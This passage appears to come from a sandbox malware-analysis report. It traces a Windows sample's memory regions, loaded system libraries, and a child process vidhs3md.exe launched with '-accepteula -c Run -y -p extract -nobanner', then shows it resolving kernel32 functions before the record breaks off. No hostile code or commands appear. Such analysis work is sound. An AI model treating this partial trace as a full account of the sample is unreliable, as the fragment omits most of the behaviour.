private name = "private_0x000000007fdeb000" filename = "" Region: id = 10007 start_va = 0x7fdee000 end_va = 0x7fdeefff entry_point = 0x0 region_type = private name = "private_0x000000007fdee000" filename = "" Region: id = 10008 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 10009 start_va = 0x7fff0000 end_va = 0x7dfaf7a0ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 10010 start_va = 0x7dfaf7a10000 end_va = 0x7ffaf7a0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfaf7a10000" filename = "" Region: id = 10011 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 10012 start_va = 0x7ffaf7bd2000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffaf7bd2000" filename = "" Region: id = 10013 start_va = 0x50c0000 end_va = 0x50c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000050c0000" filename = "" Region: id = 10014 start_va = 0x50d0000 end_va = 0x50d1fff entry_point = 0x0 region_type = private name = "private_0x00000000050d0000" filename = "" Region: id = 10035 start_va = 0x52b0000 end_va = 0x52bffff entry_point = 0x0 region_type = private name = "private_0x00000000052b0000" filename = "" Region: id = 10036 start_va = 0x73040000 end_va = 0x7308efff entry_point = 0x73040000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 10037 start_va = 0x73090000 end_va = 0x73102fff entry_point = 0x73090000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 10038 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 10039 start_va = 0x73030000 end_va = 0x73037fff entry_point = 0x73030000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 10040 start_va = 0x52c0000 end_va = 0x550ffff entry_point = 0x0 region_type = private name = "private_0x00000000052c0000" filename = "" Region: id = 10041 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 10042 start_va = 0x74d30000 end_va = 0x74ea5fff entry_point = 0x74d30000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 10043 start_va = 0x4fe0000 end_va = 0x4feffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004fe0000" filename = "" Region: id = 10044 start_va = 0x7fcc0000 end_va = 0x7fdbffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007fcc0000" filename = "" Region: id = 10127 start_va = 0x50e0000 end_va = 0x519dfff entry_point = 0x50e0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 10128 start_va = 0x778d0000 end_va = 0x7798dfff entry_point = 0x778d0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 10129 start_va = 0x51a0000 end_va = 0x51dffff entry_point = 0x0 region_type = private name = "private_0x00000000051a0000" filename = "" Region: id = 10130 start_va = 0x51e0000 end_va = 0x521ffff entry_point = 0x0 region_type = private name = "private_0x00000000051e0000" filename = "" Region: id = 10131 start_va = 0x74ad0000 end_va = 0x74c0ffff entry_point = 0x74ad0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 10132 start_va = 0x7fde8000 end_va = 0x7fdeafff entry_point = 0x0 region_type = private name = "private_0x000000007fde8000" filename = "" Region: id = 10133 start_va = 0x77370000 end_va = 0x774bcfff entry_point = 0x77370000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 10134 start_va = 0x74aa0000 end_va = 0x74abdfff entry_point = 0x74aa0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 10135 start_va = 0x772c0000 end_va = 0x7736bfff entry_point = 0x772c0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 10136 start_va = 0x4ff0000 end_va = 0x4ff3fff entry_point = 0x0 region_type = private name = "private_0x0000000004ff0000" filename = "" Region: id = 10137 start_va = 0x74a90000 end_va = 0x74a99fff entry_point = 0x74a90000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 10138 start_va = 0x74a30000 end_va = 0x74a88fff entry_point = 0x74a30000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 10139 start_va = 0x770b0000 end_va = 0x770f2fff entry_point = 0x770b0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 10140 start_va = 0x74c10000 end_va = 0x74c53fff entry_point = 0x74c10000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 10141 start_va = 0x74f70000 end_va = 0x75129fff entry_point = 0x74f70000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 10142 start_va = 0x74730000 end_va = 0x74737fff entry_point = 0x74730000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 10143 start_va = 0x52c0000 end_va = 0x53dffff entry_point = 0x0 region_type = private name = "private_0x00000000052c0000" filename = "" Region: id = 10144 start_va = 0x5410000 end_va = 0x550ffff entry_point = 0x0 region_type = private name = "private_0x0000000005410000" filename = "" Region: id = 10145 start_va = 0x5220000 end_va = 0x5249fff entry_point = 0x5220000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 10146 start_va = 0x5510000 end_va = 0x5697fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005510000" filename = "" Region: id = 10147 start_va = 0x75220000 end_va = 0x7524afff entry_point = 0x75220000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 10148 start_va = 0x76da0000 end_va = 0x76ebffff entry_point = 0x76da0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 10149 start_va = 0x5000000 end_va = 0x5004fff entry_point = 0x5000000 region_type = mapped_file name = "takeown.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\takeown.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\takeown.exe.mui") Region: id = 10150 start_va = 0x56a0000 end_va = 0x5820fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000056a0000" filename = "" Region: id = 10151 start_va = 0x5830000 end_va = 0x6c2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005830000" filename = "" Region: id = 10152 start_va = 0x5220000 end_va = 0x5220fff entry_point = 0x0 region_type = private name = "private_0x0000000005220000" filename = "" Region: id = 10153 start_va = 0x5230000 end_va = 0x5230fff entry_point = 0x0 region_type = private name = "private_0x0000000005230000" filename = "" Region: id = 10191 start_va = 0x6c30000 end_va = 0x6f66fff entry_point = 0x6c30000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 10192 start_va = 0x74c60000 end_va = 0x74cdafff entry_point = 0x74c60000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 10193 start_va = 0x74650000 end_va = 0x74677fff entry_point = 0x74650000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\SysWOW64\\ntmarta.dll" (normalized: "c:\\windows\\syswow64\\ntmarta.dll") Thread: id = 997 os_tid = 0xc6c Thread: id = 1004 os_tid = 0xca0 Process: id = "146" image_name = "vidhs3md.exe" filename = "c:\\users\\ciihmnxmn6ps\\desktop\\vidhs3md.exe" page_root = "0x7a7be000" os_pid = "0xc74" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "83" os_parent_pid = "0xe4c" cmd_line = "vIDhS3md.exe -accepteula -c Run -y -p extract -nobanner" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013c81" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 10017 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 10018 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 10019 start_va = 0x40000 end_va = 0x53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 10020 start_va = 0x60000 end_va = 0x9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 10021 start_va = 0xa0000 end_va = 0x19ffff entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 10022 start_va = 0x1a0000 end_va = 0x1a3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 10023 start_va = 0x400000 end_va = 0x476fff entry_point = 0x400000 region_type = mapped_file name = "vidhs3md.exe" filename = "\\Users\\CIiHmnxMn6Ps\\Desktop\\vIDhS3md.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vidhs3md.exe") Region: id = 10024 start_va = 0x77990000 end_va = 0x77b08fff entry_point = 0x77990000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 10025 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 10026 start_va = 0x7ffdb000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 10027 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 10028 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 10029 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 10030 start_va = 0x7fff0000 end_va = 0x7ffaf7a0ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 10031 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 10032 start_va = 0x7ffaf7bd2000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffaf7bd2000" filename = "" Region: id = 10033 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10034 start_va = 0x1c0000 end_va = 0x1c1fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 10066 start_va = 0x2e0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 10067 start_va = 0x73040000 end_va = 0x7308efff entry_point = 0x73040000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 10068 start_va = 0x73090000 end_va = 0x73102fff entry_point = 0x73090000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 10069 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 10070 start_va = 0x73030000 end_va = 0x73037fff entry_point = 0x73030000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 10071 start_va = 0x480000 end_va = 0x67ffff entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 10072 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 10073 start_va = 0x74d30000 end_va = 0x74ea5fff entry_point = 0x74d30000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 10074 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 10075 start_va = 0x7feb0000 end_va = 0x7ffaffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 10154 start_va = 0x1d0000 end_va = 0x28dfff entry_point = 0x1d0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 10155 start_va = 0x20000 end_va = 0x23fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 10156 start_va = 0x74c60000 end_va = 0x74cdafff entry_point = 0x74c60000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 10157 start_va = 0x778d0000 end_va = 0x7798dfff entry_point = 0x778d0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 10158 start_va = 0x290000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 10159 start_va = 0x2f0000 end_va = 0x3effff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 10160 start_va = 0x770b0000 end_va = 0x770f2fff entry_point = 0x770b0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 10161 start_va = 0x7ffd8000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 10162 start_va = 0x772c0000 end_va = 0x7736bfff entry_point = 0x772c0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 10163 start_va = 0x74aa0000 end_va = 0x74abdfff entry_point = 0x74aa0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 10164 start_va = 0x74a90000 end_va = 0x74a99fff entry_point = 0x74a90000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 10165 start_va = 0x74a30000 end_va = 0x74a88fff entry_point = 0x74a30000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 10166 start_va = 0x74eb0000 end_va = 0x74f6dfff entry_point = 0x74eb0000 region_type = mapped_file name = "comdlg32.dll" filename = "\\Windows\\SysWOW64\\comdlg32.dll" (normalized: "c:\\windows\\syswow64\\comdlg32.dll") Region: id = 10167 start_va = 0x74f70000 end_va = 0x75129fff entry_point = 0x74f70000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 10168 start_va = 0x771d0000 end_va = 0x7725cfff entry_point = 0x771d0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 10169 start_va = 0x74ad0000 end_va = 0x74c0ffff entry_point = 0x74ad0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 10170 start_va = 0x77370000 end_va = 0x774bcfff entry_point = 0x77370000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 10171 start_va = 0x74c10000 end_va = 0x74c53fff entry_point = 0x74c10000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 10172 start_va = 0x752c0000 end_va = 0x7667efff entry_point = 0x752c0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 10173 start_va = 0x76800000 end_va = 0x76cdcfff entry_point = 0x76800000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 10174 start_va = 0x752b0000 end_va = 0x752bbfff entry_point = 0x752b0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 10175 start_va = 0x74ce0000 end_va = 0x74d23fff entry_point = 0x74ce0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 10176 start_va = 0x77100000 end_va = 0x7710efff entry_point = 0x77100000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 10177 start_va = 0x74550000 end_va = 0x745e1fff entry_point = 0x74550000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10240.16384_none_49c02355cf03478c\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10240.16384_none_49c02355cf03478c\\comctl32.dll") Region: id = 10178 start_va = 0x74730000 end_va = 0x74737fff entry_point = 0x74730000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 10179 start_va = 0x480000 end_va = 0x52ffff entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 10180 start_va = 0x580000 end_va = 0x67ffff entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 10181 start_va = 0x480000 end_va = 0x4a9fff entry_point = 0x480000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 10182 start_va = 0x520000 end_va = 0x52ffff entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 10183 start_va = 0x680000 end_va = 0x807fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000680000" filename = "" Region: id = 10184 start_va = 0x75220000 end_va = 0x7524afff entry_point = 0x75220000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 10185 start_va = 0x76da0000 end_va = 0x76ebffff entry_point = 0x76da0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 10186 start_va = 0x810000 end_va = 0x990fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000810000" filename = "" Region: id = 10187 start_va = 0x9a0000 end_va = 0x1d9ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009a0000" filename = "" Region: id = 10188 start_va = 0x30000 end_va = 0x30fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 10189 start_va = 0x2d0000 end_va = 0x2d0fff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 10190 start_va = 0x1da0000 end_va = 0x1efffff entry_point = 0x0 region_type = private name = "private_0x0000000001da0000" filename = "" Thread: id = 998 os_tid = 0xc78 [0297.203] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x75130000 [0297.203] GetProcAddress (hModule=0x75130000, lpProcName="SetEvent") returned 0x751560c0 [0297.203] GetProcAddress (hModule=0x75130000, lpProcName="WaitForSingleObject") returned 0x75156110 [0297.203] GetProcAddress (hModule=0x75130000, lpProcName="DeviceIoControl") returned 0x751487e0 [0297.204] GetProcAddress (hModule=0x75130000, lpProcName="DuplicateHandle") returned 0x75155f30 [0297.204] GetProcAddress (hModule=0x75130000, lpProcName="FormatMessageW") returned 0x75154a40 [0297.204] GetProcAddress (hModule=0x75130000, lpProcName="CreateEventW") returned 0x75155fa0 [0297.204] GetProcAddress (hModule=0x75130000, lpProcName="CreateProcessW") returned 0x7514a510 [0297.204] GetProcAddress (hModule=0x75130000, lpProcName="ExpandEnvironmentStringsW") returned 0x7514c8c0 [0297.204] GetProcAddress (hModule=0x75130000, lpProcName="GetDriveTypeW") returned 0x75156300 [0297.204] GetProcAddress (hModule=0x75130000, lpProcName="GetSystemDirectoryW") returned 0x75149a90 [0297.204] GetProcAddress (hModule=0x75130000, lpProcName="DeleteFileW") returned 0x751561b0 [0297.204] GetProcAddress (hModule=0x75130000, lpProcName="SetThreadErrorMode") returned 0x7514fae0 [0297.204] GetProcAddress (hModule=0x75130000, lpProcName="HeapSize") returned 0x779e4f40 [0297.204] GetProcAddress (hModule=0x75130000, lpProcName="LCMapStringW") returned 0x75149a40 [0297.204] GetProcAddress (hModule=0x75130000, lpProcName="GetStringTypeW") returned 0x751479b0 [0297.204] GetProcAddress (hModule=0x75130000, lpProcName="TerminateThread") returned 0x7514fcb0 [0297.204] GetProcAddress (hModule=0x75130000, lpProcName="OpenProcess") returned 0x751492b0 [0297.205] GetProcAddress (hModule=0x75130000, lpProcName="GetVersion") returned 0x7514a300 [0297.205] GetProcAddress (hModule=0x75130000, lpProcName="CreateFileW") returned 0x75156180 [0297.205] GetProcAddress (hModule=0x75130000, lpProcName="FindResourceW") returned 0x75153a50 [0297.205] GetProcAddress (hModule=0x75130000, lpProcName="SizeofResource") returned 0x75148cb0 [0297.205] GetProcAddress (hModule=0x75130000, lpProcName="CloseHandle") returned 0x75155f20 [0297.205] GetProcAddress (hModule=0x75130000, lpProcName="SetLastError") returned 0x75142af0 [0297.205] GetProcAddress (hModule=0x75130000, lpProcName="LoadResource") returned 0x751478f0 [0297.205] GetProcAddress (hModule=0x75130000, lpProcName="GetLastError") returned 0x75142db0 [0297.205] GetProcAddress (hModule=0x75130000, lpProcName="GetCurrentProcess") returned 0x75142da0 [0297.205] GetProcAddress (hModule=0x75130000, lpProcName="LockResource") returned 0x75147a50 [0297.205] GetProcAddress (hModule=0x75130000, lpProcName="GetCommandLineW") returned 0x7514a4b0 [0297.205] GetProcAddress (hModule=0x75130000, lpProcName="GetModuleHandleW") returned 0x75149660 [0297.205] GetProcAddress (hModule=0x75130000, lpProcName="LoadLibraryW") returned 0x7514a0b0 [0297.205] GetProcAddress (hModule=0x75130000, lpProcName="GetStdHandle") returned 0x7514a060 [0297.206] GetProcAddress (hModule=0x75130000, lpProcName="LocalFree") returned 0x751487c0 [0297.206] GetProcAddress (hModule=0x75130000, lpProcName="LocalAlloc") returned 0x75148840 [0297.206] GetProcAddress (hModule=0x75130000, lpProcName="GetProcAddress") returned 0x75147940 [0297.206] GetProcAddress (hModule=0x75130000, lpProcName="GetModuleFileNameW") returned 0x75149560 [0297.206] GetProcAddress (hModule=0x75130000, lpProcName="GetConsoleScreenBufferInfo") returned 0x751569c0 [0297.206] GetProcAddress (hModule=0x75130000, lpProcName="GetFileType") returned 0x75156390 [0297.206] GetProcAddress (hModule=0x75130000, lpProcName="OutputDebugStringW") returned 0x75171c30 [0297.206] GetProcAddress (hModule=0x75130000, lpProcName="ReadConsoleW") returned 0x751568e0 [0297.206] GetProcAddress (hModule=0x75130000, lpProcName="WriteConsoleW") returned 0x75156920 [0297.206] GetProcAddress (hModule=0x75130000, lpProcName="SetFilePointerEx") returned 0x75156540 [0297.206] GetProcAddress (hModule=0x75130000, lpProcName="EnterCriticalSection") returned 0x779d5e80 [0297.206] GetProcAddress (hModule=0x75130000, lpProcName="LeaveCriticalSection") returned 0x779d5e00 [0297.206] GetProcAddress (hModule=0x75130000, lpProcName="SetStdHandle") returned 0x751726a0 [0297.206] GetProcAddress (hModule=0x75130000, lpProcName="HeapAlloc") returned 0x779cda90 [0297.206] GetProcAddress (hModule=0x75130000, lpProcName="EncodePointer") returned 0x779ef190 [0297.207] GetProcAddress (hModule=0x75130000, lpProcName="DecodePointer") returned 0x779ea200 [0297.207] GetProcAddress (hModule=0x75130000, lpProcName="ExitProcess") returned 0x751574f0 [0297.207] GetProcAddress (hModule=0x75130000, lpProcName="GetModuleHandleExW") returned 0x75149fa0 [0297.207] GetProcAddress (hModule=0x75130000, lpProcName="MultiByteToWideChar") returned 0x75142d60 [0297.207] GetProcAddress (hModule=0x75130000, lpProcName="WideCharToMultiByte") returned 0x751475a0 [0297.207] GetProcAddress (hModule=0x75130000, lpProcName="HeapFree") returned 0x751425e0 [0297.207] GetProcAddress (hModule=0x75130000, lpProcName="GetConsoleMode") returned 0x75156870 [0297.207] GetProcAddress (hModule=0x75130000, lpProcName="ReadConsoleInputA") returned 0x751568c0 [0297.207] GetProcAddress (hModule=0x75130000, lpProcName="SetConsoleMode") returned 0x75156900 [0297.207] GetProcAddress (hModule=0x75130000, lpProcName="CreateThread") returned 0x75149700 [0297.207] GetProcAddress (hModule=0x75130000, lpProcName="GetCurrentThreadId") returned 0x75141b90 [0297.208] GetProcAddress (hModule=0x75130000, lpProcName="ExitThread") returned 0x779f2570 [0297.208] GetProcAddress (hModule=0x75130000, lpProcName="LoadLibraryExW") returned 0x75147920 [0297.208] GetProcAddress (hModule=0x75130000, lpProcName="DeleteCriticalSection") returned 0x779e9920 [0297.208] GetProcAddress (hModule=0x75130000, lpProcName="FlushFileBuffers") returned 0x751562a0 [0297.208] GetProcAddress (hModule=0x75130000, lpProcName="WriteFile") returned 0x75156590 [0297.208] GetProcAddress (hModule=0x75130000, lpProcName="GetConsoleCP") returned 0x75156860 [0297.208] GetProcAddress (hModule=0x75130000, lpProcName="IsDebuggerPresent") returned 0x7514a790 [0297.208] GetProcAddress (hModule=0x75130000, lpProcName="IsProcessorFeaturePresent") returned 0x75149680 [0297.208] GetProcAddress (hModule=0x75130000, lpProcName="ReadFile") returned 0x751564a0 [0297.208] GetProcAddress (hModule=0x75130000, lpProcName="GetStartupInfoW") returned 0x7514a080 [0297.209] GetProcAddress (hModule=0x75130000, 